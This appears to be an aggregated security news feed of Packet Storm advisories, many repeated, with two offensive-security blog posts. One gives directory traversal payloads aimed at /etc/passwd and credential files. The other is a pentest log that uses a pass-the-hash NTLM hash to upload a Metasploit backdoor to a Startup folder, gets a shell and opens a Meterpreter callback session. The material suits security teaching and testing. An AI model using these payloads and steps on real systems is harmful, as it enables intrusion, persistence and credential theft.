Onapsis Security Advisory - If a "Message packet" is sent to the JDENet port (6015 by default) containing a specially crafted "File Packet", the sent file is saved in the server where the JDENet service is running, in the arbitrary location specified by the "File Packet".
-
20:06
»
Packet Storm Security Misc. Files
Onapsis Security Advisory - If a "Message packet" is sent to the JDENet port (6015 by default) containing a specially crafted "File Packet", the sent file is saved in the server where the JDENet service is running, in the arbitrary location specified by the "File Packet".
-
-
7:40
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-0310-03 - The nfs-utils package provides a daemon for the kernel Network File System server, and related tools such as the mount.nfs, umount.nfs, and showmount programs. It was found that the mount.nfs tool did not handle certain errors correctly when updating the mtab file. A local attacker could use this flaw to corrupt the mtab file.
-
7:40
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2012-0310-03 - The nfs-utils package provides a daemon for the kernel Network File System server, and related tools such as the mount.nfs, umount.nfs, and showmount programs. It was found that the mount.nfs tool did not handle certain errors correctly when updating the mtab file. A local attacker could use this flaw to corrupt the mtab file.
-
7:40
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2012-0310-03 - The nfs-utils package provides a daemon for the kernel Network File System server, and related tools such as the mount.nfs, umount.nfs, and showmount programs. It was found that the mount.nfs tool did not handle certain errors correctly when updating the mtab file. A local attacker could use this flaw to corrupt the mtab file.
-
7:28
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-0307-03 - The util-linux package contains a large variety of low-level system utilities that are necessary for a Linux system to function. Among others, util-linux contains the fdisk configuration tool and the login program. Multiple flaws were found in the way the mount and umount commands performed mtab file updates. A local, unprivileged user allowed to mount or unmount file systems could use these flaws to corrupt the mtab file and create a stale lock file, preventing other users from mounting and unmounting file systems.
-
7:28
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2012-0307-03 - The util-linux package contains a large variety of low-level system utilities that are necessary for a Linux system to function. Among others, util-linux contains the fdisk configuration tool and the login program. Multiple flaws were found in the way the mount and umount commands performed mtab file updates. A local, unprivileged user allowed to mount or unmount file systems could use these flaws to corrupt the mtab file and create a stale lock file, preventing other users from mounting and unmounting file systems.
-
7:28
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2012-0307-03 - The util-linux package contains a large variety of low-level system utilities that are necessary for a Linux system to function. Among others, util-linux contains the fdisk configuration tool and the login program. Multiple flaws were found in the way the mount and umount commands performed mtab file updates. A local, unprivileged user allowed to mount or unmount file systems could use these flaws to corrupt the mtab file and create a stale lock file, preventing other users from mounting and unmounting file systems.
-
-
11:01
»
Carnal0wnage
In
cktricky's last post he provided a great outline on the ins and outs of leveraging burp's built in support for directory traversal testing. There are two questions, however, that should immediately come to mind once you are familiar with this tool: How do I find directory traversal & what should I look for if I do?
Finding directory traversal is the hunt for dynamic file retrieval or modification. The antonym, static file retrieval, is when the
browser is delegated the request for a file on the server. In other words, every <a href>, css call for a file/location, and even most JavaScript calls can be considered static. You could copy the path of those requests into the browser address bar and grab the file yourself-- because that is pretty much what the browser is doing for you. Dynamic file retrieval, however, is when you request a server based page/function which
serves you a file. Think of it as the difference between calling someone directly on the phone vs. calling an operator who calls that person and patches you in.
Dynamic file serving takes place for a variety of reasons, such as: user content download locations, dynamic image rendering/resizing features, template engines, language parameters*, AJAX to services type calls, sometimes in cookies, and occasionally are how pages themselves get served. These all basically look something like:
somefunction.php?img=/some/place/graphic.jpg
or
somefunction.php?page=/view/something
The path to the file can either be relative (../../../etc) or in some more rare cases absolute (c:/windows/boot.ini). Additionally, these requests might be base64 or ROT13 encoded or sometimes encrypted. Neither is a stop get.
You might think language parameters are an odd location for directory traversal, but after talking with my co-workers*, they reminded be about dynamic file modification. Some frameworks use parameters (such as language) to prefix a directory to the request or alter the file name for the appropriate language. Ergo:
cookie: language=en-us;
could turn into:
File.Open('/' + language '/' + some-file);
File.Open('/' + language + '.' + some-file);
If that is true, you can alter the root of a request, then use terminators to kill off the rest of what gets appended (null chars ftw) such as:
cookie: language=../../../../../etc/passwd
cookie: language=../../../../../etc/passwd;
Language, template/skin name, or occasionally environment type variables (such as location=PROD, DEBUG, etc...). Anything that might be prefixed to a file name or directory to search is fair-game for that.
Now what?Once you've identified a location which appears to be ripe for the testing-- how do you verify and what would you do? To verify, I have found two approaches that work well: default files & known files.
The first approach is based on looking for default files on the file system. Since you are mostly blind to what exists on a server, you look for the existence of these defaults to see if they can be retrieved. There are two resources which I've found helpful. The first is Mubix's list of
post-exploitation commands. In addition to a helpful list of commands for post exploit, the list includes very common files you might want to look for and steal (by operating system). The second resource is the
Apache Default layout per OS. This can be really useful if you are attacking a system using Apache, to grab known configurations. For non-Apache web servers, I usually install them locally and see what the default layout looks like manually.
The second approach comes into play if the first fails (and it might) because the user-context of the site doesn't have the authority to access those files. So you have to request files you can be reasonably sure it has access to-- the webpages it already serves. In this approach you attempt to serve other parts of the webpage, relative to the location you are currently looking at. As a contrived example, say you see a layout something like:
/mainpage.asp /vulnerableFeature.asp?path=/images/some-image.jpg
you'd test for:
/vulnerableFeature.asp?path=../mainpage.asp /vulnerableFeature.asp?path=/mainpage.asp
Since you know that the user-context of the site has the authority to serve those pages, it -should- be a fairly practical way to verify if your directory traversal is working. You may even get back source code this way. :-)
If you are attempting to take over the server, you should be looking to steal resources which would help you with that (such as the passwd & sam files). If you are attempting to do an involuntary code review, you should steal the source code from the pages you are looking at. There are occasionally hard coded credentials source, but application configuration files are often gold for credentials. I've found database, admin users, SMTP credentials and FTP users this way.
Some final things to consider:
- Most operating systems support the use of environment variables/shortcuts for locations such as %home% or ~. This is useful to remember if there are protections against using a period or two successive periods.
- When dynamic features serve files, they often violate other protections. In IIS for instance various extensions cannot be served by the server (.config files for instance). However in most directory traversals you can pull the web.config file out w/o many problems.
- User controlled uploads often get served dynamically because there isn't a way for the server to know before-hand what the files are. You can sometimes find directory traversal here by uploading files with weird path's in their names (or renaming them after upload).
- Developers sometimes leave clues to file's physical locations in comments. I once downloaded a source for an entire site because of this.
- Image / gallery plugins for CMS's are notorious for directory traversal.
- Error messages are your friend here. If you get a system/application error instead of a file not found type error, you can at least use the mechanism to check for existence of files.
Happy Hunting.
-kuzushi
* Thanks DC & AJ
-
13:48
»
Packet Storm Security Advisories
Zero Day Initiative Advisory 12-027 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM SPSS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the SaveDoc function exposed by the VsVIEW6.ocx ActiveX control. The SaveDoc function causes a file to be created at an arbitrary path specified by the first argument (FileName). The file contents can be controlled by first setting the 'Text' member of the object. These behaviors can be exploited by a remote attacker to execute arbitrary code on the target system.
-
13:48
»
Packet Storm Security Recent Files
Zero Day Initiative Advisory 12-027 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM SPSS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the SaveDoc function exposed by the VsVIEW6.ocx ActiveX control. The SaveDoc function causes a file to be created at an arbitrary path specified by the first argument (FileName). The file contents can be controlled by first setting the 'Text' member of the object. These behaviors can be exploited by a remote attacker to execute arbitrary code on the target system.
-
13:48
»
Packet Storm Security Misc. Files
Zero Day Initiative Advisory 12-027 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM SPSS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the SaveDoc function exposed by the VsVIEW6.ocx ActiveX control. The SaveDoc function causes a file to be created at an arbitrary path specified by the first argument (FileName). The file contents can be controlled by first setting the 'Text' member of the object. These behaviors can be exploited by a remote attacker to execute arbitrary code on the target system.
-
13:38
»
Packet Storm Security Recent Files
Zero Day Initiative Advisory 12-026 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM SPSS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the Render() method exposed by the ExportHTML.dll ActiveX control. This method causes a file to be written to an arbitrary path specified by the second argument (Output). The contents of the file can be controlled by manipulating the object members 'CssLocation', 'LayoutStyle' and 'EmbedCss'. The CssLocation member can be directed to a UNC path containing a file to be included in the file generated by the call to Render(). These behaviors can be exploited by an attacker to execute arbitrary code on the target system.
-
13:38
»
Packet Storm Security Misc. Files
Zero Day Initiative Advisory 12-026 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM SPSS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the Render() method exposed by the ExportHTML.dll ActiveX control. This method causes a file to be written to an arbitrary path specified by the second argument (Output). The contents of the file can be controlled by manipulating the object members 'CssLocation', 'LayoutStyle' and 'EmbedCss'. The CssLocation member can be directed to a UNC path containing a file to be included in the file generated by the call to Render(). These behaviors can be exploited by an attacker to execute arbitrary code on the target system.
-
15:53
»
Packet Storm Security Misc. Files
Cyberoam Central Console version 2.00.2 suffers from a local file inclusion vulnerability.
-
15:12
»
Packet Storm Security Misc. Files
afick is another file integrity checker, designed to be fast and fully portable between Unix and Windows platforms. It works by first creating a database that represents a snapshot of the most essential parts of your computer system. Then a user can run the script to discover all modifications made since the snapshot was taken (i.e. files added, changed, or removed). The configuration syntax is very close to that of aide or tripwire, and a graphical interface is provided.
-
-
21:23
»
Packet Storm Security Advisories
Zero Day Initiative Advisory 12-020 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM SPSS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the SaveDoc and PrintFile functions exposed by the VsVIEW6.ocx ActiveX control. The SaveDoc function causes a file to be created at an arbitrary path specified by the first argument (FileName). The file contents can be controlled by setting the 'Header' member and calling PrintFile() with the same path argument. These behaviors can be exploited by a remote attacker to execute arbitrary code on the target system.
-
21:23
»
Packet Storm Security Recent Files
Zero Day Initiative Advisory 12-020 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM SPSS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the SaveDoc and PrintFile functions exposed by the VsVIEW6.ocx ActiveX control. The SaveDoc function causes a file to be created at an arbitrary path specified by the first argument (FileName). The file contents can be controlled by setting the 'Header' member and calling PrintFile() with the same path argument. These behaviors can be exploited by a remote attacker to execute arbitrary code on the target system.
-
21:23
»
Packet Storm Security Misc. Files
Zero Day Initiative Advisory 12-020 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM SPSS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the SaveDoc and PrintFile functions exposed by the VsVIEW6.ocx ActiveX control. The SaveDoc function causes a file to be created at an arbitrary path specified by the first argument (FileName). The file contents can be controlled by setting the 'Header' member and calling PrintFile() with the same path argument. These behaviors can be exploited by a remote attacker to execute arbitrary code on the target system.
-
-
11:28
»
Carnal0wnage
I ended up having to use the
smb/upload_file module on a pentest. I was able to get the local admin hashes but for some reason the psexec module wouldn't get code execution, it would act like it would work but wasn't. So we decided to push a binary, use
winexe that was modified to pass the hash to exec the binary as needed. It went something like this... ##################################################
# add a route to the 10.x network thru session 1
##################################################
msf exploit(handler) > route add 10.0.0.0 255.255.255.0 1
[*] Route added
#######################################################
# psexec wouldnt work. AV eating metsvc most likely...
# used smb/upload_file to place a binary on the box
######################################################
msf exploit(handler) > use auxiliary/admin/smb/upload_file
msf auxiliary(upload_file) > info
Name: SMB File Upload Utility
Module: auxiliary/admin/smb/upload_file
Version: 10394
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
hdm
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPATH yes The path of the local file to upload
RHOST yes The target address
RPATH yes The name of the remote file relative to the share
RPORT 445 yes Set the SMB service port
SMBSHARE C$ yes The name of a writeable share on the server
Description:
This module uploads a file to a target share and path. The only
reason to use this module is if your existing SMB client is not able
to support the features of the Metasploit Framework that you need,
like pass-the-hash authentication.
msf auxiliary(upload_file) > set SMBUser Administrator
SMBUser => Administrator
smsf auxiliary(upload_file) > set SMBPass aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
SMBPass => aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
msf auxiliary(upload_file) > set RHOST 1.2.3.4
RHOST => 1.2.3.4
msf auxiliary(upload_file) > set LPATH /home/chris/msf3/msf_backdoor.exe
LPATH => /home/chris/msf3/msf_backdoor.exe
msf auxiliary(upload_file) > set RPATH "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\msf_backdoor.exe"
RPATH => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe
msf auxiliary(upload_file) > run
[*] Read 13616 bytes from /home/chris/msf3/msf_backdoor.exe...
[*] Connecting to the server...
[*] Mounting the remote share \\1.2.3.4\C$'...
[*] Trying to upload Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe...
[*] The file has been uploaded to Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe...
[*] Auxiliary module execution completed
################################################
#Set up a portforward to talk to hosts via SMB
################################################
meterpreter > portfwd add -l 445 -p 445 -r 1.2.3.4
[*] Local TCP relay created: 0.0.0.0:445 <-> 1.2.3.4:445
#####################################################################
# Use winexe with pass the hash to get cmd shell and run the binary
#####################################################################
user@ubuntu:~/Desktop/winexe-hash$ export SMBHASH=aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
user@ubuntu:~/Desktop/winexe-hash$ ./winexe -U administrator //1.2.3.4 "cmd"
Password for [WORKGROUP\administrator]:
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : inside.company.com
IP Address. . . . . . . . . . . . : 1.2.3.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 1.2.3.254
C:\WINDOWS\system32>
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0007-B088
Directory of C:\Documents and Settings\All Users\Start Menu\Programs\Startup
01/13/2012 03:55 PM .
01/13/2012 03:55 PM ..
01/13/2012 03:55 PM 13,616 msf_backdoor.exe
1 File(s) 13,616 bytes
2 Dir(s) 241,661,345,792 bytes free
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>msf_backdoor.exe
msf_backdoor.exe
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>
[*] 5.5.5.5:4889 Request received for /INITM...
[*] 5.5.5.5:4889 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 5 opened (5.5.5.5:443 -> 6.6.6.6:4889) at Wed Jan 18 22:02:03 +0000 2012
-
-
18:08
»
Packet Storm Security Recent Files
The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.
-
18:08
»
Packet Storm Security Misc. Files
The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.
-
17:35
»
Packet Storm Security Exploits
phpMyAdmin versions 3.3.x and 3.4.x suffer from a local file inclusion vulnerability via XXE injection. The attacker must be logged in to MySQL via phpMyAdmin.
-
17:35
»
Packet Storm Security Recent Files
phpMyAdmin versions 3.3.x and 3.4.x suffer from a local file inclusion vulnerability via XXE injection. The attacker must be logged in to MySQL via phpMyAdmin.
-
17:35
»
Packet Storm Security Misc. Files
phpMyAdmin versions 3.3.x and 3.4.x suffer from a local file inclusion vulnerability via XXE injection. The attacker must be logged in to MySQL via phpMyAdmin.
-
-
18:34
»
Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2012-004 - Multiple vulnerabilities has been found and corrected in t1lib. A heap-based buffer overflow flaw was found in the way AFM font file parser, used for rendering of DVI files, in GNOME evince document viewer and other products, processed line tokens from the given input stream. A remote attacker could provide a DVI file, with embedded specially-crafted font file, and trick the local user to open it with an application using the AFM font parser, leading to that particular application crash or, potentially, arbitrary code execution with the privileges of the user running the application. Various other issues were also addressed.
-
18:34
»
Packet Storm Security Misc. Files
Mandriva Linux Security Advisory 2012-004 - Multiple vulnerabilities has been found and corrected in t1lib. A heap-based buffer overflow flaw was found in the way AFM font file parser, used for rendering of DVI files, in GNOME evince document viewer and other products, processed line tokens from the given input stream. A remote attacker could provide a DVI file, with embedded specially-crafted font file, and trick the local user to open it with an application using the AFM font parser, leading to that particular application crash or, potentially, arbitrary code execution with the privileges of the user running the application. Various other issues were also addressed.
Skip to page:
1
2
3
...
8
1337day (was: Inj3ct0r, 1337db)
OSVDB Vulnerabilities
Exploit-DB
SecurityFocus Vulnerabilities
Bugtraq
XSSed
Sophos security news
Penetration Testing
SecuriTeam
BackTrack Linux Forums
Threatpost
SecDocs
carnal0wnage.attackresearch.com
Darknet
The Exploitant
Hack a Day
Wirevolution
